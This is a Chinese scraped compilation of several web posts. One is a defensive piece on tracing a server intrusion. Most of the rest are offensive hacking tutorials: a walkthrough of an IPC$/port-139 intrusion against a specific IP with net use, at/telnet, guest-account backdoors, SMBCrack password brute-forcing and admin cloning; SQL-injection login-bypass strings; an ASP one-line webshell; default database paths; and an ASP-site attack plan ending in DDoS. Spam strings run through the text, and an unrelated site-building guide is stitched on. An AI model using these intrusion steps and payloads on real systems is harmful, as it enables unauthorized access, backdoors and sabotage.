本文目录一览:
- 1、0基础自学linux运维-8.1-服务器入侵溯源小技巧整理(转)
- 2、如何入侵指定网站!
- 3、侵入网站该看什么书
- 4、局域网简单入侵步骤
- 5、如何入侵ASP网站得到权限
- 6、菜鸟怎样建网站 如何建网站 新手零基础学做网站教程
0基础自学linux运维-8.1-服务器入侵溯源小技巧整理(转)
最近某司网站主页被篡改了,找师傅帮忙看看怎么回事,师傅没有空就交给我了……我自己这方面没有了解很多。事情结束后,又找师傅问了问关于溯源的技巧经验,于是就有了这篇小结。
看对方的目的是什么,就是最终目标是做什么。然后根据自己经验 看看达到这个目标 需要进行什么操作 逆推回去。看看这些过程都会留下什么日志。
分析网站源码可以帮助我们获取网站被入侵时间, 黑客如何的 IP, 等信息, 对于接下来的日志分析有很大帮助。
可以使用 D 盾查杀是否存在网站后门,如果存在 webshell,记录下该 webshell 的信息。
找到 webshell 后,就可以根据该文件的路径,在日志里查找有关信息,例如访问该文件的 IP、时间等。可以根据这些信息确定网站别入侵的时间,从而缩小搜索范围,运气好了可以直接根据 IP 找到黑客。
diff 工具推荐-diffmerge
可以根据被修改的文件的修改时间,缩小搜索范围。
可以根据文件的排序迅速找到被黑客修改的文件,从而找到入侵时间。
例:查看 10 分钟内修改过的文件
网站日志一般为
根据上一步分析网站源码得到的信息在对日志文件进行筛选分析,因为日志文件会记录很多信息,如果一条一条分析,不是很现实。
web-log 分析工具
系统日志分析
/var/log/wtmp 和/var/run/utmp 两个文件无法直接使用 cat 命令输出,但是可以使用一些命令来查看,比如 w/who/finger/id/last/ac/uptime
该命令查询 /var/log/wtmp 文件并显示 当前 系统中每个用户和它所运行的进程信息:
该命令往回搜索 /var/log/wtmp 文件来显示自从该文件第一次创建以来所有登录过的用户:
如果指明了用户,则该命令只显示该用户的近期活动:
/var/log/lastlog 文件在每次有用户登录时被查询。可以使用 lastlog 命令来检查某特定用户上次登录的时间,并格式化输出上次登录日志 /var/log/lastlog 的内容。它根据 UID 排序显示登录名、端口号(tty)和上次登录时间。如果一个用户从未登录过,lastlog 显示 Never logged(从未登录过)。注意需要以 root 运行该命令:
4. id 用单独的一行打印出当前登录的用户,每个显示的用户名对应一个登录会话。 如果一个用户有不止一个登录会话,那他的用户名将显示相同的次数:
检查服务器是否有黑客留下的木马程序。
指令:ps aux|grep ‘pid’
整理完这篇总结,感觉溯源是一个很细节的事情,需要注意每一个细节,这篇总结也可以是一个备忘,以后在遇到溯源的活,做的时候就可以更系统一些。第一次投稿写的不好,师傅们多多指教哈,嘻嘻。
如何入侵指定网站!
首先,观察指定网站。
入侵指定网站是需要条件的:
要先观察这个网站是动态还是静态的。
如果是静态的(.htm或html),一般是不会成功的。
如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。
Quote:以下是入侵网站常用方法:
1.上传漏洞如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
2.注入漏洞字符过滤不严造成的
3.暴库:把二级目录中间的/换成%5c
4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
5.社会工程学。这个我们都知道吧。就是猜解。
6.写入ASP格式数据库。就是一句话木马〈%execute request("value")%〉 (数据库必需得是ASP或ASA的后缀)
比如:默认数据库,默认后台地址,默认管理员帐号密码等
8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp/diy.asp/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
工具:网站猎手 挖掘鸡 明小子
侵入网站该看什么书
黑客新手教程--入侵
2006-11-12 08:42:34 / 天气: 晴朗 / 心情: 高兴
我的日志
对于刚刚学习黑客技术的朋友,时常会觉得无从下手,网上的教程满天飞,但即实用又贴近初学者的却不多,我现在就来讲讲通过139端口的入侵。考虑到大家可能对许多相关知识并不熟悉,因此我的文章分为两个部份:第一部份是相关知识的介绍,第二部份是通过一次实例,详细讲述入侵过程和各种命令的运用。现在,let's go。
5e@pf9~)I0 第一部份:知识介绍爱好者博墅M t8pM+bnX,_
(1)什么是端口
i;eSN#v)Mf0 端口是各种程序为了接收和发送数据而开的“窗户”,程序需要它来与外界进行通讯,你可以把它想象成一个邮箱,我要传递消息给你,我就会把消息放到你的邮箱里。你要得到消息,你只需要打开邮箱把消息拿出来。同样,别的计算机为了和你的机器通讯,会把数据发到你的机器的端口上,计算机读取端口就可以得到数据。
0qn$jxW8R'h0 (2)端口是唯一的吗?
d h S F~p1j Q+Z0K0 端口不是唯一的。端口分两种:TCP端口和UDP端口,每种端口最多有65535个,分别用自然数1~65535编号。这里我不解释TCP端口和UDP端口有什么不同,你只须要知道不同的端口对应不同的程序,每个程序只能只能读取发送到属于自己端口上的数据。举个例子,hi.exe打开TCP6500端口,如果我把数据发送到TCP6501端口或是UDP6500端口,hi.exe都接收不到,只有发送到TCP6500端口的数据hi.exe才能接收。爱好者博墅t@#gN1P1BBS]
(3)TCP139端口的作用
\+g6k@"]0 TCP139是用于网络共享的端口,只有当一台计算机开放了TCP139端口时别的计算机才能访问其上的共享文件。但是在Windows 2000/ NT/ XP中,TCP139端口还有一个重要的作用:远程管理连接(IPC$,Admin$),这是微软为了方便管理员对远程计算机的管理而特意设置的。为了能够成功地建立IPC$(远程管理)连接,你需要管理员的用户名和密码,这也是基于139端口入侵的重点,只要我们得到了远程计算机的密码,再通过139端口进行IPC$连接,我们就完全控制了远程的计算机。
nSl;c)x_}y0 (4)必要命令的详解和相关工具的使用
st q'l(@SrC0b0 首先必须说明,为了你能在黑客道路上成长起来,拆了你的Win98,装上Windows2000吧,以下我所写的命令和工具大多仅适用于Windows2000/ NT/ XP。
P @7i~]4W0 点击开始→运行,输入cmd.exe,跳出一个命令行窗口,你可得熟悉它,因为入侵时95%的工作都是在这里完成的。现在,我来介绍成功进行139入侵的几个必要命令:dir,cd,del,copy,net,at。
4p"g,r@duS5|0 dir的作用是列出指定路径下的目录和文件,输入c:\dir c:\ 就会列出C盘下的所有目录和文件,dir c:\winnt\ 列出C盘下winnt文件夹下的目录和文件。dir有3个常用的参数 /p,/a,/s, /p是用来分屏显示列出的文件的,通常某个目录下文件很多,一个屏幕显示不下,我们就会用到/p 如dir c:\ /p。/a是用来显示隐藏的文件、目录的,在Windows里设置一个文件属性为隐藏(假设此文件为c:\a.txt),然后在命令行下输入dir c:\a.txt,你会发现系统告诉你找不到此文件(file not fount),而输入dir c:\a.txt /a,你就可以看到隐藏的a.txt了。/s是在入侵时非常有用的一个参数,作用是搜索当前驱动器(C盘,D盘……),查找指定文件。比如我要删除对方的主页文件index.asp,但不知到这个文件的位置,我们就可以利用dir index.asp /s在各个分区下进行搜索。
C['_^}9U A^0 cd的作用是进入目录,cd c:\winnt\system32 就到了system32目录之中了。不信你可以用dir和dir c:\winnt\system32,得到的结果是一样的,如果你要切换分区,c:\d: 就到了D盘下了,而不用cd d:,这点要注意。爱好者博墅/@Kb/HL;t ?5Q
del的作用是删除文件,del c:\a.txt 就把a.txt 给删了。
;}D |0uU3w0 copy的作用是拷贝文件,这个命令很重要,一定要熟练掌哦。copy c:\a.txt d:\mp3\b.txt 把C盘下的a.txt拷到D盘下的mp3目录下,并重命名为b.txt,注意哦,copy后的文件类型可以是任意的,copy c:\a.exe 就把文件类型改成了可执行文件。当然,a.exe 不会正常运行。爱好者博墅!r` z Bz1IVS Fx
net 命令是139端口入侵的重中之重,整个入侵过程会多次用到它。在命令行窗口下输入net,可以看到有一大堆参数,别被这一大堆参数吓怀了,现在我来为你一一讲解。
s C+Ay5? Y.}y0 net use
'qFqi ve0net use 命令用于与远程主机建立IPC$(管理)连接,当你有远程计算机的用户名(通常用户名为administrator,记住它)和密码时,在命令行窗口下输入net use\\IP\IPC$"password"/user:administrator,你就成功地建立了与远程计算机的连接。在这之后,可以对其进行管理了。net use 还有一个用处,即映射远程机器的共享资源,输入net use z: \\IP\C$ (注意!在此之后的一切命令都是基于第一个命令的,也就是说必须先建立IPC$连接后,这些命令才会成功),打开“我的电脑”,你会发现多了一个Z盘,里面全是远程主机C盘下的东西,你在Z盘里删除了一个文件,对方C盘下的这个文件就也被删除了,所有对Z盘的操作其实就是对远程计算机的C 盘的操作。怎么样,是不是很有意思呢?爱好者博墅/^)o!e]L6{2z
net view爱好者博墅/v-o?MN'I.H
net view 用于查看远程计算机有哪些共享资源,通常你会看到my document之类的共享文件夹,输入net view \\IP即可。我个人认为net view 没有太大用处,要知道,在Windows2000中,各个硬盘都是共享的,但是如果你用net view 来查看,你会发现并无C,D,E 之类的共享资源。这是为什么呢?注意,在这之前的一些命令中,我们曾输入过IPC$,C$这样的奇怪东西,其实,Windows2000中,带"$"后缀的共享资源是隐藏的,在命令行窗口下是无法看到的,Windows2000中各个盘都是以诸如C$,D$,E$ 这样的名称共享的,所以我们看不到,但确实存在,IPC$也是如此。爱好者博墅 J+NAy?sFt9F#Q
net share
*Y,\ IP"h.?;I8l~ H0net share 用于开放共享,输入net share QQ=c:\tencent,你会发现多了一个名为QQ的共享资源。这个命令有慎么作用呢?假设一个主机安全做的不错,关闭了IPC$,C$,D$ 等共享,那么我们就无法在139端口上建立管理连接,也无法访问对方的C盘,当我们通过别的手段进入后(如远程溢出),我们就可以用net share 开放IPC$,从而转为熟悉的139端口的入侵,开放IPC$ 的命令为net share IPC$。相应的,如果你想关闭共享,你可以加上/del 后缀,例如net share c$ /del 就关闭了C盘的共享。爱好者博墅%b`rn0ja
net user爱好者博墅"q"R7p Qy"EO
net user 命令用于管理主机上的用户,仅输入不带任何参数的net user 会列出计算机上所有的用户名。现在就让我们看看net user 命令是如何对用户进行操作的。 爱好者博墅8y1d.Ur}kUs X
┎———————————————————————————————————————————————————————┒
6yYI#czO0 ┃ net user hacker 12345 /add 建立一个名为hacker,密码为12345的用户。 ┃
4LFNKBuV*v0 ┃ net user hacker /del 删除名为hacker的用户。 ┃ 爱好者博墅9iY%U1fI9Q;ypb'E
┃ net user hacker /active:no 禁用hacker这个用户,这个用户不能再登陆此计算机。 ┃爱好者博墅1C0q@ w[,zq*qR
┃ net user hacker /active:yes 激活已禁用的hacker这个用户。 ┃ 爱好者博墅;o#\4d#c;H,G
┃ net localgroup administrator hacker /add 把hacker这个用户添加进管理员组,即提升hacker的权限,使之变为管理员 ┃
L5B.S XzK~"r%qO0┖———————————————————————————————————————————————————————┚
3\|;h aU,]0net start / net stop
iC!ok n0net start / net stop 命令用于起动/停止系统服务,通常我们会net stop w3svc (停止网页服务),然后替换网页,对此命令我不多讲,知道即可。爱好者博墅"`k,H5au'S;O;U
*at 命令,net time
"g|?\f;VJ0之所以把它们放在一起来讲,是因为at命令要用到net time命令的结果,一般我们先 net view \\ip,得到远程主机的时间(假设得到的时间为9:00),然后at \\ip 9:00 telnet 就启动了telnet服务,at这个命令就是用来远程运行程序的.
(5)需要准备的工具
p'ZXeY5z"j0 肉鸡猎手v1.0 扫描一个网段,找出弱密码的计算机爱好者博墅v8|+rMNO4YYFus
SMBCrack 针对特定主机,暴力猜解密码爱好者博墅 ^,f]cRs+n
DameWare Mini Remote Control 监控运程屏幕
~f9b fy#i"o0 CA.exe 克隆管理员账号
第二部份:入侵实例
,Kz/K ?#Hbw/k0今天打星际,被一高手反复摧残,郁闷ing……于是上网活动一下。打开肉鸡猎手,在开始IP和结束IP中填入想扫描的IP端,点击开始,不一会儿之后,两台肉鸡出现在我们面前(图一)。现在,让我们点击“开始”→“运行”→cmd.exe,打开可爱的命令行窗口。输入:net use \\218.80.236.37\IPC$ "" /user:administrator,提示“命令成功完成”。哈哈,现在我们就建立好了IPC$(远程管理连接),再来,取得远程主机时间:net time \\218.80.236.37 显示: \\218.80.236.37 的当前时间是 2003/5/22 上午 10:32。然后用at命令启动远程主机的telent服务,at \\218.80.236.37 10:32 telent,方便我们登陆远程主机。(注意! 建立IPC$连接和登陆远程主机是截然不同的两个概念,建立IPC$是为了能够使用at 命令来启动telent服务,几乎所有的命令都是在登陆远程主机之后使用,否则都是对你自己的计算机操作。)然后,telent 218.80.236.37 23,出现如图提示窗口(图二),敲入administrator 回车两次,出现了命令提示符,现在开始我们敲入的命令都会在远程计算机上执行。先输入net user 看看有哪些用户,这里我们只发现了administrator,guest,Iuser_KiKi三个用户,考虑到下次进入该主机时用户可能已经更改了administrator 的密码,为了能够顺利地再次进入,我们需要留下一个小后门。通常我们会这样做,输入net user guest/active:yes 激活guest 用户(guest用户系统内置的,因此每台计算机上都有,默认禁用此用户)。net user guest 12345 更改guest的密码为12345,net localgroup administrators guest /add 把guest的权限提升为管理员权限,这样下次来的时后可以取得对远程主机的完全控制权。留好了后门之后,你可以好好地在他的机子上逛一圈,看看有没有什么有趣的东西,顺便把你刚学的命临实际操作一下。如果你觉得命令行实在不方便,那么跟我来,我将带你进入丰富多采的图形界面。现在,在命临行窗口下输入exit,显示“断开远程主机的连接”,我们用exit这个命令离开了远程主机,回到自己的机器上,点击载下来的DameWare,出现如图所示界面(图三),在"host name"里填上对方IP,输入用户名administrator和密码(现在密码为空,所以不填),点击"Connect",然后等待DameWare拷贝文件,启动服务等一系列动作完成。一会而之后,出现如图(图四)窗口,里面现示的就是远程主机的桌面,别人的一举一动你都可以看见,你还可以接管他的鼠标,是不是挺有意思的呢?但是记住,我们是来学习技术的,并不是来破坏的,所以千万别做什么坏事哦。爱好者博墅"W e!Y8De
文章写到这里就告一段落了,其实对于入侵实例,有几点我想特别提一下:
#s3c#J7{6`DoD0 (1)肉鸡猎手只能搜密码为空的主机,所以只能一开始让我们练练手。一般要对139端口攻击,我们使用SMBCrack这个软件,它是针对一台主机进行密码的暴力猜解的,速度非常快,在我机器上猜了24万个密码只用了半小时左右,命令行窗口下输入smbcrack 218.80.236.37 administrator words.txt 139 就开始猜解密码了。218.80.236.37这里改为你要攻击的IP,words.txt是字典,里面含有很多口令,你可以自己上网找找,好的字典能提高入侵的成功率。爱好者博墅-B4ejtb'a-S0Dr$A
(2)telent上对方的机器后,我们为了更加隐蔽地留下后门,常常使用CA.exe,CA是(clone administrator)的缩写,看名字你就应该知道,它可以把其它用户克隆成管理员,CA.exe \\218.80.236.37 Administrator Password IUSR_VICTIM SetNewPass,把IUSR_VICTIM克隆成为管理员,密码是SetNewPass,克隆完成之后,一般是无法发现的,所以隐蔽性非常高。爱好者博墅.d Yk$RrIC9?
(3)at 这个命令有点搞笑,很多人先net view \\IP 看了时间后,再用at 来启动对方程序却常常失败,这是因为很多人都不知道,用net view \\IP 得到的时间不能直接用于at,这涉及到+12的问题,如果你看到对方的时间是 下午 3:00,那么at 应该这样使用at \\IP 15:00 telent。爱好者博墅8C,Q7Jr*M
好了,就说到这里了。相信看了本文之后,各位都能够成功地对139端口进行入侵,至于进去之后做什么,各位就自己发挥吧。
局域网简单入侵步骤
事先 声明,本人不是黑客,不懂高深的计算机知识。
三步骤:
一、到要入侵的电脑上(假设IP:192.168.0.100),右击我的电脑--远程--允许用户远程连接到此计算机打勾。如果不懂得超级管理员权限,就去新建个帐户。
二、在你自己的电脑上,打开cmd ,输入:mstsc,跳出远程桌面,输入192.168.0.100。进入之后,要求输入正确的用户名密码,你就把刚刚建的帐户输入,或者你本来就已经知道超级管理员的权限,也可以输入。
三、进去之后,你可以写上某某到此一游。或者直接点开始--关机。于是......
请采纳
如何入侵ASP网站得到权限
ASP站比较好入手,具体情况具体操作,提供一些思路。
1、既然是ASP系统那自然就是想办法找注入点,SQL注入猜解管理员密码(当然如果是MSSQL用户类型就考虑用别的,SA权限就直接备份网马拿Webshell了。
2、如果没有很好的注入点那猜解数据库吧,(注意对方是否是整站系统,如果是,可以自己下一套研究下数据库的地址,默认的后台地址,默认管理密码等,也可以自己分析是否存在隐含过滤不严导致的漏洞。)如猜解到数据库,那么自然就是下载下来然后找是否存在管理员密码。
3、不管是否获得管理员密码都要寻找后台地址,同样可以使用工具快速搜索,也可以凭经验试一试admin_login.asp,admin.asp,login.asp,等页面是否存在。
4、使用常用密码对后台进行爆破尝试。如user:admin pass:admin等。这个要凭经验了。
5、以上均无奈何就只能剑走偏锋了,尝试从系统本身是否存在恶性漏洞,如某处对某个ASP文件进行了直接修改无任何过滤,那么就可以尝试插一句话。或者某处参数过滤不严,可以尝试参数暴库。
6、实在是无可奈何又一定想要拿下,尝试着从服务器本身入手(远程溢出),尝试从IIS漏洞入手。
7、旁注吧,既然本身已经固若金汤。
8、愤怒吧,既然攻不下来,也要毁掉对方,抄出变异CC,DDOS对对方系统发动狂轰滥炸以泄愤。
8、如果均不奏效,放弃吧,这目标太。。。
菜鸟怎样建网站 如何建网站 新手零基础学做网站教程
以Disczu论坛为例:
1,先简单配置网站云服务器,在选购云服务器时,建议使用建站系统,集成 Apache2.4、PHP5.5、MySQL5.5, 简单快捷,省得自己去花时间配置服务器,对于不会打命令的网站小白有非常大的帮助。在选好建站系统后,一定要记住MySQL root 密码,登陆云服务器root 密码。
2,把之前下载好的Discuz软件安装包,通过FTP上传工具上传到云服务器目录根低下。把Discuz安装包中upload中所有文件上传到网站目录底下。
3,等文件上传完成后,通过网站云服务器IP地址访问,开始进行安装Discuz网站搭建平台,在安装过程需要输入MySQL root账户密码。
4,安装成后,在登陆到域名网站,进行域名管理,把你的域名指向到云服务器IP地址,就可以使用域名访问网站啦。
后言:这样子就可以搭建出一个属于自己自媒体网站,在Discuz网站应用中心,还有很多好看的网站模板可以直接下载使用,换一个好看简单的模版,你的个人自媒体网站就可以上线啦。